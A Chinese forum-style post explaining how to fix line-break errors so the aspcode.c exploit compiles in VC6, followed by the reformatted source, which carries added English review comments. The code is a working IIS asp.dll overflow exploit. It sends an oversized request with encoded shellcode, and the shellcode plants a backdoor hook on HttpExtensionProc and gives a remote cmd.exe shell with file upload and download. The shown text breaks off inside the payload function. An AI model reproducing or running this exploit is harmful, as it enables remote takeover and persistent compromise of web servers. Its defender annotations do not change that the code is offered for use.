对于兄弟的第二个代码aspcode.c,到该网址上复制出代码后,粘贴到VC6编辑器中,直接编译会报告一大堆错误,仔细看一下,都是一些源代码字符串不符合规定造成的,基本上都是
变量名 或 常量名 或 注释
被不适当的回车换行符给截断了,造成VC误解出错,
只要将它们调整到一行上即可编译通过。
注:直接在IE地址栏打开网址
http://www.packetstormsecurity.org/0209-exploits/aspcode.c
看到的是不换行的“通篇”代码,很难看的,这时可以点击鼠标右键查看源文件,看到的代码就是整齐的了。
一个小技巧。 附调整后的代码供参考:
/*
aspcode.c ver1.0
iis4.0、iis5.0、iis5.1 asp.dll overflow program
copy by yuange <yuange@nsfocus.com> 2002.4.24
*/
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <httpext.h>
#pragma comment(lib,"ws2_32")
//#define RETEIPADDR eipwin2000
#define FNENDLONG 0x08      // bytes of fnendstr compared when searching for a function's NOP end marker
#define NOPCODE 0x90
#define NOPLONG 0x50
#define BUFFSIZE 0x20000
#define PATHLONG 0x12
#define RETEIPADDRESS 0x468
#define SHELLBUFFSIZE 0x800 // size of the pipe/relay buffer used by shellcodefn
#define SHELLFNNUMS 14
#define DATABASE 0x61       // 'a': base character of the two-chars-per-byte payload encoding in main
#define DATAXORCODE 0x55
// Modulus and seed of the XOR "lock" stream (newsend/newrecv/shellcodefn).
// Both are fixed constants, so the stream is reproducible by anyone who
// captures the traffic — it is obfuscation, not encryption.
#define LOCKBIGNUM 19999999
#define LOCKBIGNUM2 13579139
#define MCBSIZE 0x8
#define MEMSIZE 0xb200
#define SHELLPORT 0x1f90 //0x1f90=8080
#define WEBPORT 80
void shellcodefnlock();
void shellcodefnlock2();
void shellcodefn(char *ecb);
void shellcodefn2(char *ecb);
void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int
len);
void iisput(int fd,char *str);
void iisget(int fd,char *str);
void iiscmd(int fd,char *str);
// NOTE(review): declared with empty parameter lists but defined and called
// with (int fd, char *str); legal in C89 but unchecked by the compiler.
void iisreset();
void iisdie();
void iishelp();
int newrecv(int fd,char *buff,int size,int flag);
int newsend(int fd,char *buff,int size,int flag);
int xordatabegin;          // set to 1 once "XORDATA" has been seen from the server; decoding starts after it
int lockintvar1,lockintvar2; // XOR stream state: lockintvar1 = receive direction, lockintvar2 = send direction
char lockcharvar;          // current key byte derived from the stream state
/*
 * Client side: builds one HTTP request carrying the overflow data and the
 * encoded payload, sends it, then acts as a console for the "iis*" commands
 * (see iishelp).  Request features a defender can match on are all literal
 * below: the "?!!ko " query suffix (buff3), the Content-length values in
 * buff6/buff61, a body made largely of 'A'/0x90 filler, and the "XORDATA"
 * marker the payload sends back before the XOR stream begins.
 *
 * argv: [1] server (optionally with scheme prefix), [2] asp file, [3] web
 *       port, [4] "winxp" / "apache" variant, [5] target build
 *       (cn / sp0 / msvcrt / sp2), [6] value for the HOST header.
 * Returns 0; calls exit(1) on WSAStartup, name resolution or connect failure.
 * NOTE(review): interactive input is read with gets() into BUFFSIZE buffers;
 * gets() has no bound, so an overlong line overflows the client's own stack.
 */
int main(int argc, char **argv)
{
char *server;
// NUL-separated table of API and DLL names that the payload resolves at run
// time (shellcodefn walks it; a leading 0x09 marks a DLL name).  The table
// ends at "strend", which is not copied.
char *str="LoadLibraryA""\x0""CreatePipe""\x0"
"CreateProcessA""\x0""CloseHandle""\x0"
"PeekNamedPipe""\x0"
"ReadFile""\x0""WriteFile""\x0"
"CreateFileA""\x0"
"GetFileSize""\x0"
"GetLastError""\x0"
"Sleep""\x0"
"\x09""ntdll.dll""\x0""RtlEnterCriticalSection""\x0"
"\x09""asp.dll""\x0""HttpExtensionProc""\x0"
"\x09""msvcrt.dll""\x0""memcpy""\x0""\x0"
"cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0"
"XORDATA""\x0""xordatareset""\x0"
"strend";
// char buff0[]="TRACK / HTTP/1.1\nHOST:";
// Request fragments, concatenated in order further down.
char buff1[]="GET /";
char buff2[]="default.asp";
char *buff2add;
char buff3[]="?!!ko ";
char buff4[]=" HTTP/1.1 \nHOST:";
char buff5[]="\nContent-Type: application/x-www-form-urlencoded";
char buff51[]="\nTransfer-Encoding:chunked";
char buff6[]="\nContent-length: 2147506431\r\n\r\n"; // 0x80000000+MEMSIZE-1
char buff61[]="\nContent-length: 4294967295\r\n\r\n"; // 0xffffffff
// 16-byte records written into the trailing 0xc000-byte block (see the
// loop over i below); buff8/buff9 supply per-record bytes.
char buff7[]=
"\x10\x00\x01\x02\x03\x04\x05\x06\x1c\xf0\xfd\x7f\x20\x21\x00\x01";
char buff11[]=
"\x02\x00\x01\x02\x03\x04\x05\x06\x22\x22\x00\x01\x22\x22\x00\x01";
char buff10[]="\x20\x21\x00\x01\x20\x21\x00\x01";
char buff9[]= "\x20\x21\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30";
char buff8[]= "\x81\xec\xff\xe4\x90\x90\x90\x90\x90\x90\x90\x90\x90";
/*
char
buff10[]="\x10\x00\x01\x02\x03\x04\x05\x06\x1d\x21\x00\x01\xec\x21\x00\x01";
char
buff11[]="\x10\x00\x01\x02\x03\x04\x05\x06\x20\x21\x00\x01\x01\x21\x00\x01";
char
buff12[]="\x10\x00\x01\x02\x03\x04\x05\x06\x21\x21\x00\x01\x00\x21\x00\x01";
char
buff13[]="\x10\x00\x01\x02\x03\x04\x05\x06\x22\x21\x00\x01\xff\x21\x00\x01";
char
buff14[]="\x10\x00\x01\x02\x03\x04\x05\x06\x23\x21\x00\x01\xe4\x21\x00\x01";
char
buff15[]="\x10\x00\x01\x02\x03\x04\x05\x06\x24\x21\x00\x01\x90\x21\x00\x01";
*/
// End marker searched for in the in-process function images (9 NOPs; only
// FNENDLONG of them are compared).
char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char SRLF[]="\x0d\x0a\x00\x00";
// Per-build return addresses; which one is used is chosen from argv[5].
char *eipexceptwin2000add;
char eipexceptwin20002[]="\x80\x70\x9f\x74"; // push ebx ; ret address
char eipexceptwin2000cn[]="\x73\x67\xfa\x7F"; // push ebx ; ret address
char eipexceptwin2000[]="\x80\x70\x97\x74";
// char eipexceptwin2000[]="\xb3\x9d\xfa\x77"; // \x01\x78";
// call ebx address
char eipexceptwin2000msvcrt[]="\xD3\xCB\x01\x78";
char eipexceptwin2000sp2[]="\x02\xbc\x01\x78";
// char eipexceptwin2000[]="\x0B\x08\x5A\x68";
// char eipexceptwin2000[]="\x32\x8d\x9f\x74";
char eipexceptwinnt[] ="\x82\x01\xfc\x7F"; // push esi ; ret address
// char eipexceptwinnt[] ="\x2e\x01\x01\x78";
// call esi address
// char eipexcept2[]="\xd0\xae\xdc\x77"; //
char buff[BUFFSIZE];          // the outgoing request, later reused for console I/O
char recvbuff[BUFFSIZE];
char shellcodebuff[BUFFSIZE]; // raw copy of shellcodefn's code + string table
char shellcodebuff2[BUFFSIZE];// decoder stub + encoded payload + padding, appended to the request
struct sockaddr_in s_in2,s_in3;
struct hostent *he;
char *shellcodefnadd,*chkespadd;
unsigned int sendpacketlong,buff2long,shelladd,packlong;
int i,j,k,l,strheadlong;
unsigned char temp;
int fd;
u_short port,port1,shellcodeport;
SOCKET d_ip;
WSADATA wsaData;
int offset=0;
int OVERADD=RETEIPADDRESS;
int result;
fprintf(stderr,"\n IIS ASP.DLL OVERFLOW PROGRAM 2.0 .");
fprintf(stderr,"\n copy by yuange 2002.4.24.");
fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net .");
fprintf(stderr,"\n welcome to http://www.nsfocus.com .");
fprintf(stderr,"\n usage: %s <server> [aspfile] [webport] [winxp] \n",
argv[0]);
buff2add=buff2;
// No server on the command line: prompt for server and asp file name,
// skipping leading blanks.
if(argc <2){
fprintf(stderr,"\n please enter the web server:");
gets(recvbuff);
for(i=0;i<strlen(recvbuff);++i){
if(recvbuff[i]!=' ') break;
}
server=recvbuff;
if(i<strlen(recvbuff)) server+=i;
fprintf(stderr,"\n please enter the .asp filename:");
gets(shellcodebuff);
for(i=0;i<strlen(shellcodebuff);++i){
if(shellcodebuff[i]!=' ') break;
}
buff2add=shellcodebuff+i;
printf("\n .asp file name:%s\n",buff2add);
}
eipexceptwin2000add=eipexceptwin2000;
// printf("\n argc%d argv%s",argc,argv[5]);
// argv[5] selects the target build variant.
if(argc>5){
if(strcmp(argv[5],"cn")==0) {
eipexceptwin2000add=eipexceptwin2000cn;
printf("\n For the cn system.\n");
}
if(strcmp(argv[5],"sp0")==0) {
eipexceptwin2000add=eipexceptwin20002;
printf("\n For the sp0 system.\n");
}
if(strcmp(argv[5],"msvcrt")==0) {
eipexceptwin2000add=eipexceptwin2000msvcrt;
printf("\n Use msvcrt.dll JMP to shell.\n");
}
if(strcmp(argv[5],"sp2")==0) {
eipexceptwin2000add=eipexceptwin2000sp2;
printf("\n Use sp2 msvcrt.dll JMP to shell.\n");
}
}
result= WSAStartup(MAKEWORD(1, 1), &wsaData);
if (result != 0) {
fprintf(stderr, "Your computer was not connected "
"to the Internet at the time that "
"this program was launched, or you "
"do not have a 32-bit "
"connection to the Internet.");
exit(1);
}
/*
if(argc>4){
offset=atoi(argv[4]);
}
// OVERADD+=offset;
// packlong=0x10000-offset+0x8;
if(offset<-0x20||offset>0x20){
fprintf(stderr,"\n offset error !offset -32 --- +32 .");
gets(buff);
exit(1);
}
*/
if(argc <2){
// WSACleanup( );
// exit(1);
}
else server = argv[1];
// Normalise the server string: strip leading blanks, a "scheme://" prefix,
// and anything from the first '\' or '/' onwards (it is NUL-terminated there).
for(i=0;i<strlen(server);++i){
if(server[i]!=' ')
break;
}
if(i<strlen(server)) server+=i;
for(i=0;i+3<strlen(server);++i){
if(server[i]==':'){
if(server[i+1]=='\\'||server[i+1]=='/'){
if(server[i+2]=='\\'||server[i+2]=='/'){
server+=i;
server+=3;
break;
}
}
}
}
for(i=1;i<=strlen(server);++i){
if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0;
}
d_ip = inet_addr(server);
if(d_ip==-1){
he = gethostbyname(server);
if(!he)
{
WSACleanup( );
printf("\n Can't get the ip of %s !\n",server);
gets(buff);
exit(1);
}
else memcpy(&d_ip, he->h_addr, 4);
}
if(argc>3) port=atoi(argv[3]);
else port=WEBPORT;
if(port==0) port=WEBPORT;
fd = socket(AF_INET, SOCK_STREAM,0);
i=8000;
// NOTE(review): return values of socket()/setsockopt() are not checked.
setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));
s_in3.sin_family = AF_INET;
s_in3.sin_port = htons(port);
s_in3.sin_addr.s_addr = d_ip;
printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));
if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct
sockaddr_in))!=0)
{
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n connect err.");
gets(buff);
exit(1);
}
// Resolve the real address of the MSVC debug helper _chkesp (which the
// compiler inserts after inline asm); if the symbol is an incremental-link
// thunk (first byte 0xe9 = jmp rel32) follow it to the body.
_asm{
mov ESI,ESP
cmp ESI,ESP
}
_chkesp();
chkespadd=_chkesp;
temp=*chkespadd;
if(temp==0xe9) {
++chkespadd;
i=*(int*)chkespadd;
chkespadd+=i;
chkespadd+=4;
}
/*
shellcodefnadd=shellcodefnlock;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x500;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
*/
memset(buff,NOPCODE,BUFFSIZE);
/*
strcpy(buff,buff0);
if(argc>6) strcat(buff,argv[6]);
else strcat(buff,server);
strcat(buff,"\r\n\r\n"); //Proxy_Connection: Keep-Alive\r\n");
strcat(buff,buff1);
*/
strcpy(buff,buff1);
strheadlong=strlen(buff);
OVERADD+=strheadlong-1;
if(argc>2) buff2add=argv[2];
// Drop leading path separators from the asp file name.
for(;;++buff2add){
temp=*buff2add;
if(temp!='\\'&&temp!='/') break;
}
// printf("\nfile:%s",buff2add);
buff2long=strlen(buff2add);
strcat(buff,buff2add);
// fprintf(stderr,"\n offset:%d\n",offset);
// offset+=strheadlong-strlen(buff1);
/*
for(i=0x404;i<=0x500;i+=8){
memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32
memcpy(buff+offset+i+4,eipexceptwin2000add,4);
}
if(argc>5){
if(strcmp(argv[5],"sp2")==0) {
memcpy(buff+offset+i,"\x58",1);
}
}
for(i=0x220;i<=0x380;i+=8){
memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32
memcpy(buff+offset+i+4,eipexceptwinnt,4);
}
for(i=0x580;i<=0x728;i+=8){
memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32
memcpy(buff+offset+i+4,eipexceptwinnt,4);
}
*/
// winnt 0x2cc or 0x71c win2000 0x130 or 0x468
// memcpy(buff+offset+i+8,exceptret,strlen(exceptret));
// Locate the body of shellcodefnlock (following a jmp thunk as above) and
// its first NOP marker; k+8 then skips that leading marker.
shellcodefnadd=shellcodefnlock;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x500;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
memset(shellcodebuff2,NOPCODE,BUFFSIZE);
i=0x1000;
// Copy 0x100 bytes of the decoder stub to offset 0x1000+4 of shellcodebuff2.
memcpy(shellcodebuff2+i+4,shellcodefnadd+k+8,0x100);
// Same for shellcodefn: copy its code up to the NOP end marker and remove
// the compiler-generated _chkesp calls from the copy.
shellcodefnadd=shellcodefn;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=BUFFSIZE;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
// k+=0x
memcpy(shellcodebuff,shellcodefnadd,k); //j);
cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
// Append the API name table (up to, not including, "strend").
for(j=0;j<0x400;++j){
if(memcmp(str+j,"strend",6)==0) break;
}
memcpy(shellcodebuff+k,str,j);
sendpacketlong=k+j;
// Find the end of the stub inside shellcodebuff2 and append the payload
// after it as two characters per byte: DATABASE + high nibble, then
// DATABASE + low nibble ('a'..'p'), so the request body stays printable.
for(k=0;k<=0x200;++k){
if(memcmp(shellcodebuff2+i+4+k,fnendstr,FNENDLONG)==0) break;
}
for(j=0;j<sendpacketlong;++j){
temp=shellcodebuff[j];
// temp^=DATAXORCODE;
shellcodebuff2[i+4+k]=DATABASE+temp/0x10;
++k;
shellcodebuff2[i+4+k]=DATABASE+temp%0x10;
++k;
}
j=i+k;
j=j%8+3;
shellcodebuff2[i+j+k]=0;
// j=strlen(shellcodebuff2)%8+3;
// Pad with about 0xe000 bytes of 'A'.
for(j=0;j<=0xe000;j+=4){
strcat(shellcodebuff2,"\x41\x41\x41\x41"); // 0x2d sub eax,num32
// strcat(shellcodebuff2,eipexceptwin2000cn);
}
/*
strcat(shellcodebuff2,"\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0f\x66\x83\
x6c\x24\x02\x01\x66\x81\x2c\x24\x01\x01\xff\x24\x24\xe8\xec\xff\xff\xff\
x90");
for(j=0;j<=0xb00;j+=4){
strcat(shellcodebuff2,"\x90\x90\x90\x2d"); // 0x2d sub eax,num32
}
*/
// printf("\nbuff:%s",buff);
printf("\n shellcode long 0x%x\n",sendpacketlong);
// Assemble the request: query suffix, HOST header (argv[6] or the server
// name), content type, the encoded payload, and the Content-length line.
if(argc>4&&strcmp(argv[4],"apache")==0){
strcat(buff," ");
}
else strcat(buff,buff3);
printf("\n packetlong:0x%x\n",sendpacketlong);
strcat(buff,buff4);
if(argc>6) strcat(buff,argv[6]);
else strcat(buff,server);
strcat(buff,buff5);
if(argc>4&&strcmp(argv[4],"apache")==0) strcat(buff," ");
else strcat(buff,shellcodebuff2);
// strcat(buff,buff51);
if(argc>4&&(strcmp(argv[4],"winxp")==0||strcmp(argv[4],"apache")==0)) {
printf("\n for %s system\n",argv[4]);
strcat(buff,buff61);
}
else strcat(buff,buff6);
// printf("\n send buff:\n%s",buff);
/*
i=strlen(buff);
memset(buff+i,'a',0xc000);
memset(buff+i+0xc000-strlen(buff7),0,1);
strcat(buff+i+0xc000-0x10-strlen(buff7),buff7);
*/
// strcpy(buff8,buff7);
/* temp=buff7[5];
temp-=offset*0x10;
buff7[5]=temp;
i=*(int *)(buff7+4)+2;
printf("\nSEH=0x%x\n",i);
*/
/*
for(i=0;i<8;++i){
temp=buff7[i];
printf("%2x",temp);
}
*/
/*
for(i=0;i<0xc000/0x10;++i){
strcat(buff,buff7);
}
*/
// printf("\nbuff=%s\n",buff);
// strcat(buff,"\r\n");
// printf("\n send buff:\n%s",buff);
// strcpy(buff+OVERADD+NOPLONG,shellcode);
sendpacketlong=strlen(buff);
// printf("buff:\n%s",buff+0x10000);
/*
#ifdef DEBUG
_asm{
lea esp,buff
add esp,OVERADD
ret
}
#endif
*/
// Seed both directions of the XOR stream from the fixed constants; the
// payload seeds itself the same way (shellcodefn).
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
xordatabegin=0;
// NOTE(review): i is reused as the record index inside this loop, so the
// loop body appears to run exactly once.
for(i=0;i<1;++i){
j=sendpacketlong;
// buff[0x2000]=0;
fprintf(stderr,"\n send packet %d bytes.",j);
// gets(buff);
send(fd,buff,j,0);
// Overwrite buff with 16-byte records (buff7/buff10/buff11 patterns) up
// to 0xc000 and send that block as the request body.
buff7[0]=MCBSIZE;
j=MEMSIZE+0x10;
i=0;
if(argc>4&&strcmp(argv[4],"winxp")==0)
{
j=0x18;
i=8;
}
for(k=0;i<0xc000;i+=0x10){
if(i>=j) {
k=((i-j)/(MCBSIZE*8));
if(k<=6){
memcpy(buff7+0x8,buff10,8);
buff7[0x8]=buff8[k];
buff7[0xc]=buff9[k];
}
else memcpy(buff7,buff11,0x10);
}
memcpy(buff+i,buff7,0x10);
}
if(argc>4&&strcmp(argv[4],"apache")==0){
for(k=0xb000;k<=0xc000;k+=2)
{
memset(buff+k,0x0d,1);
memset(buff+k+1,0x0a,1);
}
buff[0xc000]=0;
// for(k=0;k<0x10;++k) send(fd,buff,0xc000,0);
// printf("\nbuff:%s\n",buff);
}
else send(fd,buff,0xc000,0);
// Blocking mode; wait until the payload announces itself with "XORDATA".
k=0;
ioctlsocket(fd, FIONBIO, &k);
j=0;
while(j==0){
k=newrecv(fd,recvbuff,BUFFSIZE,0);
if(k>=8&&strstr(recvbuff,"XORDATA")!=0) {
xordatabegin=1;
fprintf(stderr,"\n ok!recv %d bytes\n",k);
recvbuff[k]=0;
// printf("\n recv:%s",recvbuff);
// for(k-=8,j=0;k>0;k-=4,++j)printf("recvdata:0x%x\n",*(int*)(recvbuff+8+4*j));
k=-1;
j=1;
}
if(k>0){
recvbuff[k]=0;
fprintf(stderr,"\n recv:\n %s",recvbuff);
}
}
}
// Non-blocking mode for the interactive console below.
k=1;
ioctlsocket(fd, FIONBIO, &k);
// fprintf(stderr,"\n now begin: \n");
/*
for(i=0;i<strlen(SRLF);++i){
SRLF[i]^=DATAXORCODE;
}
send(fd,SRLF,strlen(SRLF),0);
send(fd,SRLF,strlen(SRLF),0);
send(fd,SRLF,strlen(SRLF),0);
*/
// Console loop: k<0 means "read a line from stdin"; "iis*" prefixes are
// handled locally (and the line is still sent afterwards), anything else
// is sent to the remote cmd.exe with CRLF appended.  l counts idle polls.
k=1;
l=0;
while(k!=0){
if(k<0){
l=0;
i=0;
while(i==0){
gets(buff);
if(memcmp(buff,"iish",4)==0){
iishelp();
i=2;
}
if(memcmp(buff,"iisput",6)==0){
iisput(fd,buff+6);
i=2;
}
if(memcmp(buff,"iisget",6)==0){
iisget(fd,buff+6);
i=2;
}
if(memcmp(buff,"iiscmd",6)==0){
iiscmd(fd,buff+6);
i=2;
}
if(memcmp(buff,"iisreset",8)==0){
iisreset(fd,buff+6);
i=2;
}
if(memcmp(buff,"iisdie",6)==0){
iisdie(fd,buff+6);
i=2;
}
if(i==2)i=0;
else i=1;
}
k=strlen(buff);
memcpy(buff+k,SRLF,3);
// send(fd,SRLF,strlen(SRLF),0);
// fprintf(stderr,"%s",buff);
/*
for(i=0;i<k+2;++i){
lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
buff[i]^=lockcharvar; // DATAXORCODE;
// buff[i]^=DATAXORCODE;
}
send(fd,buff,k+2,0);
*/
newsend(fd,buff,k+2,0);
// send(fd,SRLF,strlen(SRLF),0);
}
k=newrecv(fd,buff,BUFFSIZE,0);
if(xordatabegin==0&&k>=8&&strstr(buff,"XORDATA")!=0) {
xordatabegin=1;
k=-1;
}
if(k>0){
// fprintf(stderr,"recv %d bytes",k);
/*
if(xordatabegin==1){
for(i=0;i<k;++i){
lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
buff[i]^=lockcharvar; // DATAXORCODE;
}
}
*/
l=0;
buff[k]=0;
fprintf(stderr,"%s",buff);
}
else{
// Nothing received: poll up to 20 times (20 ms apart) before prompting again.
Sleep(20);
if(l<20) k=1;
++l;
}
// if(k==0) break;
}
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n the server close connect.");
gets(buff);
return(0);
}
/*
 * Decoder stub.  Never called directly: main copies the bytes between the
 * leading and trailing NOP markers into the request.  The loop reverses the
 * two-characters-per-byte encoding done in main (each char minus DATABASE
 * is one nibble) in place, stops at the first 0 byte, and falls through
 * into the decoded bytes at `shell`.  Position independent: the address is
 * obtained with call/pop (getediadd).
 */
void shellcodefnlock()
{
_asm{
nop
nop
nop
nop
nop
nop
nop
nop
jmp next1
getediadd: pop edi
mov esp,edi
and esp,0xfffff0f0
jmp next2
getshelladd:
push 0x01
mov eax,edi
inc eax
inc eax
inc eax
inc eax
inc eax
mov edi,eax
mov esi,edi
// sub sp,8
xor ecx,ecx
looplock: lodsb
cmp al,cl
jz shell
sub al,DATABASE
mov ah,al
lodsb
sub al,DATABASE
shl ah,4
add al,ah
// lea eax,ptr word [edx*4+al]
stosb
jmp looplock
next1: call getediadd
next2: call getshelladd
shell:
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}
/*
 * Payload that runs inside the IIS worker once the overflow has diverted
 * control.  main copies this function's code (up to the trailing NOP
 * marker) plus the API/DLL name table into the request.  Outline, as far as
 * the code shows:
 *   - registers `except` as the head of the SEH chain (FS:[0]) so faults
 *     during the memory scan land in errprogram;
 *   - scans for the MZ/PE image that exports GetProcAddress (kernel32) and
 *     resolves the name table into apifnadd[] (0x09 entries are DLLs);
 *   - unless re-entered through the `door` stub (thedoor==1), patches the
 *     stored HttpExtensionProc pointer so later requests whose body starts
 *     with 'ok!!' come back here;
 *   - spawns cmd.exe on two pipes and relays its output to the client
 *     through the ISAPI WriteClient/ReadClient callbacks (ecb+0x84/+0x88).
 * Wire commands, read after XOR decoding: "iisc " (new cmd.exe with the
 * given command line), "reset", "iisrr", "put ", "get "; anything else is
 * written to cmd.exe's stdin.
 * Defender note: the XOR stream is seeded from LOCKBIGNUM2 % LOCKBIGNUM (or
 * 0 when the request carries 'notx'), i.e. from constants, so captured
 * traffic can be decoded without any secret.
 * `ecb`: the ISAPI EXTENSION_CONTROL_BLOCK pointer, accessed by raw offsets.
 * Never returns normally: ends in `die: goto die` or the asmreturn stub.
 */
void shellcodefn(char *ecb)
{ char Buff[SHELLBUFFSIZE+2];
int *except[3];               // hand-built SEH record: [0]=-1 marker, [1]=handler, [2]=previous FS:[0]
FARPROC memcpyadd;
FARPROC msvcrtdlladd;
FARPROC HttpExtensionProcadd;
FARPROC Aspdlladd;
FARPROC RtlEnterCriticalSectionadd;
FARPROC Ntdlladd;
FARPROC Sleepadd;
FARPROC GetLastErroradd;
FARPROC GetFileSizeadd;
FARPROC CreateFileAadd;
FARPROC WriteFileadd;
FARPROC ReadFileadd;
FARPROC PeekNamedPipeadd;
FARPROC CloseHandleadd;
FARPROC CreateProcessadd;
FARPROC CreatePipeadd;
FARPROC procloadlib;
// NOTE(review): apifnadd has one element but is indexed from 1 upwards in the
// resolve loop; the writes land on the FARPROC locals declared above it
// (stack layout dependent, MSVC-specific).
FARPROC apifnadd[1];
FARPROC procgetadd=0;
FARPROC writeclient;
FARPROC readclient;
HCONN ConnID;
FARPROC shellcodefnadd=ecb;
char *stradd,*stradd2,*dooradd;
int imgbase,fnbase,i,k,l,thedoor;
HANDLE libhandle;
int fpt; //libwsock32;
STARTUPINFO siinfo;
PROCESS_INFORMATION ProcessInformation;
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
int lBytesRead;
int lockintvar1,lockintvar2;
char lockcharvar;
int shelllocknum;
// unsigned char temp;
SECURITY_ATTRIBUTES sa;
// Get the run-time address of the string table (call/pop) and install
// `except` as the current SEH record.
_asm { jmp nextcall
getstradd: pop stradd
lea EDI,except
mov eax,dword ptr FS:[0]
mov dword ptr [edi+0x08],eax
mov dword ptr FS:[0],EDI
}
except[0]=0xffffffff;
except[1]=stradd-0x07;
imgbase=0x77e00000;
_asm{
call getexceptretadd
}
// Walk 64 KB-aligned addresses looking for an MZ/PE image whose export
// table name is "KERNEL32.DLL" and read the export entry for GetProcAddress.
for(;imgbase<0xbffa0000,procgetadd==0;){
imgbase+=0x10000;
if(imgbase==0x78000000) imgbase=0xbff00000;
if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int
*)(imgbase+0x3c))=='EP'){
fnbase=*(int *)(imgbase+*(int
*)(imgbase+0x3c)+0x78)+imgbase;
k=*(int *)(fnbase+0xc)+imgbase;
if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
libhandle=imgbase;
k=imgbase+*(int *)(fnbase+0x20);
for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int
*)(4+imgbase+*(int *)k)=='Acor')
{
k=*(WORD *)(l+l+imgbase+*(int
*)(fnbase+0x24));
k+=*(int *)(fnbase+0x10)-1;
k=*(int *)(k+k+k+k+imgbase+*(int
*)(fnbase+0x1c));
procgetadd=k+imgbase;
break;
}
}
}
}
}
// Search for the KERNEL32.DLL module base and the address of the API GetProcAddress.
// Note: the case where a searched page is not present is handled here (via the SEH record).
if(procgetadd==0) goto die ;
// Resolve the name table: entries starting with 0x09 are DLL names passed to
// LoadLibraryA, all others are looked up in the most recently loaded module.
i=stradd;
for(k=1;*stradd!=0;++k) {
if(*stradd==0x9) libhandle=procloadlib(stradd+1);
else apifnadd[k]=procgetadd(libhandle,stradd);
for(;*stradd!=0;++stradd){
}
++stradd;
}
++stradd;
// Fixed address patched with the RtlEnterCriticalSection pointer; the
// purpose is not evident from this code.
k=0x7ffdf020;
*(int *)k=RtlEnterCriticalSectionadd;
k=stradd;
stradd=i;
thedoor=0;
i=0;
_asm{
jmp getdoorcall
getdooradd: pop dooradd;
mov l,esp
call getexceptretadd
}
// thedoor==1 when we were entered through the `door` stub for a request
// whose body starts with 'ok!!'.
if(i==0){
++i;
if(*(int *)ecb==0x90){
if(*(int *)(*(int *)(ecb+0x64))=='ok!!') {
i=0;
thedoor=1;
}
}
}
// First entry: fill in the door stub's two return targets, find the
// real ECB on the stack, and replace stored HttpExtensionProc pointers
// with the door stub so later requests re-enter this code.
if(i!=0){
*(int *)(dooradd-0x0c)=HttpExtensionProcadd;
*(int *)(dooradd-0x13)=shellcodefnadd;
ecb=0;
_asm{
call getexceptretadd
}
i=ecb;
i&=0xfffff000;
ecb=i;
ecb+=0x1000;
for(;i<l;++i,++ecb)
{
if(*(int *)ecb==0x90){
if(*(int *)(ecb+8)==(int *)ecb){
if(*(int *)*(int *)(ecb+0x64)=='ok!!') break;
}
}
}
i=0;
_asm{
call getexceptretadd
}
i&=0xfffff000;
i+=0x1000;
for(;i<l;++i){
if(*(int *)i==HttpExtensionProcadd){
*(int *)i=dooradd-7;
// break;
}
}
// *(int *)(dooradd-0x0c)=HttpExtensionProcadd;
}
// ISAPI callbacks and connection id, read from the ECB by offset.
writeclient= *(int *)(ecb+0x84);
readclient = *(int *)(ecb+0x88);
ConnID = *(int *)(ecb+8) ;
stradd=k;
// Unlink our SEH record (restore the saved FS:[0]).
_asm{
lea edi,except
mov eax,dword ptr [edi+0x08]
mov dword ptr fs:[0],eax
}
if(thedoor==0){
_asm{
mov eax,0xffffffff
mov dword ptr fs:[0],eax
}
}
stradd2=stradd;
stradd+=8;
// Send the 0x20 bytes at ecb+0x6c followed by 8 bytes of the table
// (stradd+9) — this is the "XORDATA" announcement the client waits for.
k=0x20;
writeclient(ConnID,*(int *)(ecb+0x6c),&k,0);
k=8;
writeclient(ConnID,stradd+9,&k,0);
// Sleepadd(100);
// Seed the XOR stream; a request marked 'ok!!notx' disables it (seed 0).
shelllocknum=LOCKBIGNUM2;
if(*(int *)*(int *)(ecb+0x64)=='ok!!'&&*(int *)(*(int
*)(ecb+0x64)+4)=='notx') shelllocknum=0;
// iiscmd:
lockintvar1=shelllocknum%LOCKBIGNUM;
lockintvar2=lockintvar1;
// Re-entered by goto for every "iisc " command: start a fresh cmd.exe
